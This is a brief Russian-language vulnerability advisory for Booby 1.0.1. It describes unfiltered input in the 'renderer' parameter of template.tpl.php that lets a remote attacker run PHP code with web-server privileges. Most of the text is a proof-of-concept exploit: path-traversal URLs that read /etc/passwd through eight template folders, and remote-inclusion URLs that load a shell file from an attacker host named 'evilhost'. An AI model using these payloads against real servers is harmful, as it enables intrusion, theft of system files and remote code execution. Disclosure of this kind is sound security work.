Программа: Booby 1.0.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «renderer» сценарием template.tpl.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

Proof Of Concept LFI:

http://localhost/path/templates/barrel/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/barry/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/mylook/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/oerdec/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/penguin/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/sidebar/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/slashdot/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/text-only/template.tpl.php?renderer=../../../../../../etc/passwd

Proof Of Concept RFI:

http://localhost/path/templates/barrel/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/barry/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/mylook/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/oerdec/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/penguin/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/sidebar/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/slashdot/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/text-only/template.tpl.php?renderer=evilhost/shell.txt



Оставить мнение